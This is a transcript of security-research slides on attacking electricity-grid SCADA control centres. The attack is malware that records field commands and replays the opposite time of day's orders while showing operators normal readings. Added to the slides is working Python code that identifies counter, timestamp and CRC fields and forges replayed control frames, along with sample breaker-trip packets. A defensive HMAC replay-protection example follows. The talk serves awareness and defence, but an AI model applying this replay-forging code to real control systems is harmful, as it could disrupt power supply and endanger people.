www.c4-security.com Eyal Udassin – C4 Security

Post on 31-Mar-2015

TRANSCRIPT

Page 1: Www.c4-security.com Eyal Udassin – C4 Security.  Contents Introduction The Problem – Security by Obscurity The Solution – Behavioral

www.c4-security.com

Eyal Udassin – C4 Security

Page 2: Contents

Introduction

The Problem – Security by Obscurity

The Solution – Behavioral Attack

Recommendations

Page 3: About C4

Based in Israel

Consists of security experts, reverse engineers and protocol analysts

Provide “red team” penetration tests to utilities, financial institutions and governmental agencies

Our team’s skills enable us to find and exploit vulnerabilities in proprietary systems

Experts in SCADA security

Contact: [email protected] / www.c4-security.com

Page 4: Introduction – Terminology

SCADA – Supervisory Control and Data Acquisition

DCS – Distributed Control System

Command-and-control (C&C) systems for electricity, water, sewage, gas, oil, trains, petrochemical plants etc.

Energy management systems (EMS) are SCADA systems, as they control network nodes dispersed over a large geographical area

These systems bring power to your home

Page 5: Introduction

National infrastructure utilities directly affect the well-being of nations’ civilians; thus they are a prime target for terrorists

The “Holy Grail” for an attacker in the SCADA environment is the Control Center

We strongly believe that in order to thwart such attacks, it is necessary to conduct the same offensive research

Page 6: Typical Control Center Elements

Page 7: Background

3 critical vulnerabilities in GE-Fanuc Cimplicity and Proficy were disclosed by us at S4-2008 (including a stable heap overflow)

Even though this was the first time that taking control over the SCADA server was demonstrated, there were a few engineers who doubted that it would allow an attacker to cause real damage

Skeptics fuel progress – time for stage II

Page 8: The Problem

The #1 claim from big-scale SCADA operations is:

Even if you assume complete control over our control center, you will not be able to cause substantial physical damage, as:

1. You’re not a control engineer, so you won’t understand what you’re seeing on the HMI

2. You won’t find any documentation on the network to allow you to map the SCADA network addresses and their datapoints to their “meaning” – what they control in the physical world

Page 9: The Problem

Without a mapping of the addresses & datapoints to physical locations and controlled devices, it is very difficult to generate malicious packets

Such a map can usually be found on the operators’ workstations and the SCADA server as a tag database. Each tag is a user-friendly name given to an address/datapoint

“We keep the mapping only in paper copy” etc.

Mmmm… strange, but let’s play along

Page 10: Translation to IT Security Terms

Security by obscurity

To be completely honest – it’s one of the few places where it might actually work!

Two “shortcuts” to beating security by obscurity are missing:

Can’t trigger events

Few (if any) string anchors

Page 11: Translation to IT Security Terms

Example packets:

0a 07 d9 08 3b 92 0b af 00 0b – Trip a breaker (920b) – address (d9083b)

0a 08 80 b5 cc 91 01 00 0b – Read generation frequency (9101) on plant #11 – address (80b5cc)

Page 12: The Solution

Base assumptions: The Good

Assumption 1 – Security by obscurity works. We will never know what the data “means”

Already discussed

No “silver bullet” – can’t cause an “Aurora”-style attack, as we don’t know what kind of generator is used nor where it is located logically

Assumption 2 – Even if we have the map, causing substantial damage is difficult

Complexity – mitigated by getting a control engineer on board

Safety mechanisms – 3 cases in the past year where these failed due to mechanical or human error

Page 13: Base Assumptions (cont.)

The Bad

Assumption 3 – Control protocols are simple: 95% are Start/Stop, TLV, or fixed size and format

Assumption 4 – We own the communication server (aka FEP)

This is where we left off in our previous research; for more details see:

http://www.c4-security.com/SCADA%20Security%20-%20Attack%20Vectors.pdf

The Ugly

Assumption 5 – Humans need more electricity when they are awake

Page 14: Daily Electricity Demand – England

Page 15: Daily Electricity Demand – The Czech Republic

Page 16: Daily Electricity Demand – Scotland

Page 17: Attack Vector

The main goal of the control center is to keep the grid balanced – generation should match the demand

From the previous graphs we see that:

In the morning the grid utilization is increased

In the evening it is decreased

How does this work to our advantage?

Let’s turn night into day, and vice versa

No need to know what we’re sending, as the operators already took care of that for us

Page 18: Malware Design

Install malware on the comm. server

Stage I – Learning Mode

Sniff traffic to and from the field (easy to distinguish)

Create request/response pairs with a timestamp for day & night classification

Auto-identify “problematic” fields:

CRC/Parity fields

Timestamps

Counters

Simple statistical computations

Page 19: Malware Design

Stage II – Active Mode

When enough packet data is collected, wait for the next critical time of day (dawn, nightfall)

Drop all messages coming from the SCADA server

Instead, send the commands of the opposite timeframe to the field
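The two-stage procedure on the slides above, as an added worked example; this is not C4’s tool (the slides show no code). The frame layout (start byte, length, 3-byte address, 2-byte command, one-byte sequence counter, 4-byte Unix time, CRC-8, end byte), the command codes 0x9201/0x8a07, the CRC polynomial and the 24-hour capture are all constructed to resemble the hex dumps on the “Translation to IT Security Terms” slide; only orders from the comm. server toward the field are modelled, not request/response pairs. It shows the three “problematic” field types being recognised from byte statistics alone, with no knowledge of what the address or command bytes mean, and then the recorded night-time orders being re-issued at 07:00 with a fresh counter, timestamp and CRC so that the field device’s own checks still pass.

```python
"""Learning-mode field classifier and opposite-timeframe replay (added example)."""
from datetime import datetime, timezone

# Constructed fixed-size frame, hypothetical but modelled on the slide's hex dumps:
#   0a | len | addr(3) | cmd(2) | seq | unix-time(4) | crc8(len..time) | 0b
START, END = 0x0A, 0x0B
DAY_START = int(datetime(2023, 11, 14, tzinfo=timezone.utc).timestamp())   # constructed day
DAY_CMD, NIGHT_CMD = 0x9201, 0x8A07            # hypothetical "raise output" / "lower output"
ADDRS = (0xD9083B, 0x80B5CC, 0x1122AA)         # two addresses from the slide, one made up

def crc8(data: bytes, poly: int = 0x07) -> int:
    crc = 0
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = ((crc << 1) ^ poly) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc

def build_frame(addr: int, cmd: int, seq: int, ts: int) -> bytes:
    body = (bytes([0x0C]) + addr.to_bytes(3, "big") + cmd.to_bytes(2, "big")
            + bytes([seq & 0xFF]) + ts.to_bytes(4, "big"))
    return bytes([START]) + body + bytes([crc8(body)]) + bytes([END])

def frame_ok(frame: bytes) -> bool:
    """What the field device checks before acting: framing bytes and CRC."""
    return frame[0] == START and frame[-1] == END and crc8(frame[1:-2]) == frame[-2]

def period(ts: int) -> str:
    return "day" if 6 <= datetime.fromtimestamp(ts, timezone.utc).hour < 18 else "night"

def make_sample_capture():
    """Constructed 24 h sniff of comm. server -> field: one order per hour."""
    capture = []
    for i in range(24):
        ts = DAY_START + i * 3600
        cmd = DAY_CMD if period(ts) == "day" else NIGHT_CMD
        capture.append((build_frame(ADDRS[i % 3], cmd, i, ts), ts))
    return capture

def classify_fields(frames, times, tol: int = 2):
    """Label every byte offset as timestamp / constant / counter / crc / payload."""
    n = len(frames[0])
    fields, crc_spans = {}, {}
    # Timestamp: a 4-byte big-endian window whose offset from capture time is stable.
    for o in range(n - 3):
        deltas = [int.from_bytes(f[o:o + 4], "big") - t for f, t in zip(frames, times)]
        if max(deltas) - min(deltas) <= tol:
            fields.update({p: "timestamp" for p in range(o, o + 4)})
    for p in range(n):
        if p in fields:
            continue
        col = [f[p] for f in frames]
        if len(set(col)) == 1:
            fields[p] = "constant"                      # framing, length, fixed flags
        elif all((b - a) % 256 == 1 for a, b in zip(col, col[1:])):
            fields[p] = "counter"                       # increments by one per frame
        else:
            fields[p] = "payload"                       # address/command: meaning unknown
            # CRC: some earlier span whose CRC-8 equals this byte in every frame.
            for s in range(p):
                for e in range(s + 1, p + 1):
                    if all(crc8(f[s:e]) == f[p] for f in frames):
                        fields[p], crc_spans[p] = "crc", (s, e)
                        break
                if p in crc_spans:
                    break
    return fields, crc_spans

def learn(capture):
    """Stage I: classify fields and bucket the recorded orders by time of day."""
    frames, times = [f for f, _ in capture], [t for _, t in capture]
    fields, crc_spans = classify_fields(frames, times)
    buckets = {"day": [], "night": []}
    for f, t in capture:
        buckets[period(t)].append(f)
    return {"fields": fields, "crc_spans": crc_spans, "buckets": buckets}

def forge(model, template: bytes, seq: int, now: int) -> bytes:
    """Re-issue a recorded frame now: refresh the fields that would betray a replay."""
    frame = bytearray(template)
    ts_pos = sorted(p for p, lbl in model["fields"].items() if lbl == "timestamp")
    if ts_pos:
        frame[ts_pos[0]:ts_pos[0] + len(ts_pos)] = now.to_bytes(len(ts_pos), "big")
    for p, lbl in model["fields"].items():
        if lbl == "counter":
            frame[p] = seq & 0xFF
    for p, (s, e) in model["crc_spans"].items():      # last, so the CRC covers the edits
        frame[p] = crc8(bytes(frame[s:e]))
    return bytes(frame)

def replay_opposite(model, now: int, seq_start: int):
    """Stage II: at 'now', send what the operators sent in the opposite timeframe."""
    opposite = "night" if period(now) == "day" else "day"
    return [forge(model, t, seq_start + i, now)
            for i, t in enumerate(model["buckets"][opposite])]

CAPTURES = make_sample_capture()
MODEL = learn(CAPTURES)

if __name__ == "__main__":
    print({p: lbl for p, lbl in sorted(MODEL["fields"].items())})
    for f in replay_opposite(MODEL, DAY_START + 7 * 3600, seq_start=100)[:2]:
        print(f.hex(), frame_ok(f))
```

The reason the “problematic” fields matter: a verbatim replay already carries a valid CRC, but any field device that checks a sequence number or a timestamp would drop it, so the malware has to recognise those fields and refresh them, then recompute the checksum that covers them. That is only possible because a CRC is unkeyed; the “we sign all messages” exception on the Drawbacks slide is exactly the case where the last step fails for lack of the key.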

Page 20: Malware Design

What will happen in Active Mode? Example – sunrise time

Electricity demand constantly rises

The field devices will receive night-time commands – e.g. “disconnect aux. power plant from the grid”, “lower power output from main power plant” etc.

Operators will try to connect more power plants, without success, as their commands are ignored

Network instability – supply will not meet the demand

Potentially causing blackouts

May change electric frequency

Page 21: Advanced Attack Vector

An even nastier approach is to record the communication between the comm. server and the SCADA server as well

When the system goes from “learn mode” to “active mode”, perform two actions:

Send the control data to the field as previously mentioned

Don’t drop the SCADA server requests; send the responses which it expects at this time from the field

Page 22: Advanced Attack Vector – Expected result

Field devices are performing the exact opposite of their required behavior

SCADA operators see that everything is running smoothly

Page 23: Design Advantages

Little to zero knowledge of the network design and implementation is required

One-time insertion of the malware, no need for ongoing communications

Physical impact is likely

Page 24: Drawbacks

There are always exceptions

“We sign all messages” – ~<1%, very modern

Unique network architectures

Prior knowledge of the protocols used will greatly increase the chance of impact, as the “learn mode” will be well defined

Independent safety controls will alert the operators, and might contain the damage to a certain degree

Looking for guinea pigs!

Page 25: Recommendations

Relax

Not FUD. It’s not going to happen tomorrow

Not to be underestimated though – acknowledged by control center engineers from 3 T&D utilities

The goal is to increase awareness of the importance of securing your SCADA network

Page 26: Recommendations

Several potential mitigations:

Strong authentication of messages between the SCADA server and the communication server

Field communication solutions:

Encrypt or digitally sign messages (a signature without a freshness element such as a sequence number or timestamp still lets a recorded genuine message be replayed unchanged)

Obfuscation with key swap every X days (Rrushi – S4 2007)

Chaffing – switch live/simulation between two FEPs every day

These solutions address the question – “How do I minimize the damage to my assets, even after my control center is compromised?”
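An added example of the first mitigation above, message authentication between the SCADA server and the communication server (the same construction serves toward the field); it is not from the slides or from any product, and the key, message format and command bytes are constructed. It shows why a freshness counter matters as much as the tag against a record-and-replay attack: a genuine daytime order replayed at the opposite time of day still carries a valid tag, so only the stale counter gives it away, while a spliced or key-less forgery fails the tag check.

```python
"""Authenticated, replay-resistant command channel (added example)."""
import hashlib
import hmac
import struct

TAG_LEN = 8      # truncated HMAC-SHA256 tag; constructed choice for a low-rate serial-style link
KEY = hashlib.sha256(b"constructed demo key").digest()   # real deployments: per-link key from key management

def protect(key: bytes, seq: int, payload: bytes) -> bytes:
    """Sender side: 32-bit strictly increasing counter || payload || tag over both."""
    hdr = struct.pack(">I", seq)
    tag = hmac.new(key, hdr + payload, hashlib.sha256).digest()[:TAG_LEN]
    return hdr + payload + tag

class Receiver:
    """Communication server or field side: check the tag first, then insist on a fresh counter."""
    def __init__(self, key: bytes):
        self.key = key
        self.last_seq = -1          # must survive restarts in a real device, or replay reopens

    def accept(self, msg: bytes) -> str:
        if len(msg) < 4 + TAG_LEN:
            return "too short"
        hdr, payload, tag = msg[:4], msg[4:-TAG_LEN], msg[-TAG_LEN:]
        expected = hmac.new(self.key, hdr + payload, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            return "bad tag"        # modified, spliced, or forged without the key
        seq = struct.unpack(">I", hdr)[0]
        if seq <= self.last_seq:
            return "replay"         # a genuine frame, but one the receiver has already seen
        self.last_seq = seq
        return "ok"

def scenario() -> list:
    """Record a daytime order, replay it later, and try two forgeries."""
    fep = Receiver(KEY)
    day_order = protect(KEY, 1, b"\x92\x01")        # hypothetical 'raise output'
    night_order = protect(KEY, 2, b"\x8a\x07")      # hypothetical 'lower output'
    spliced = night_order[:4] + b"\x92\x01" + night_order[6:]   # swap payload, keep old tag
    return [
        fep.accept(day_order),                          # genuine -> ok
        fep.accept(day_order),                          # verbatim replay later -> replay
        fep.accept(spliced),                            # payload swapped -> bad tag
        fep.accept(protect(b"guess", 3, b"\x92\x01")),  # forged without the key -> bad tag
        fep.accept(night_order),                        # next genuine frame still ok
    ]

if __name__ == "__main__":
    print(scenario())
```

Two consequences for the design on the slides: encryption alone does not help here, because the attacker replays recorded ciphertext unchanged and never needs to read it; and signing toward the field only helps if the signing key is not sitting on the compromised communication server (assumption 4), e.g. because the SCADA server signs end-to-end and the FEP merely forwards.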

Page 27: Summary

Choose your field protocols with security in mind

Asset owners – demand quality software which undergoes an ongoing assessment of its resilience to attack

And on top of that – prevent control center compromise (assumption #4). Be prepared, audit yourselves!

“All that is necessary for evil to triumph is for good men to do nothing”

Edmund Burke, 1770
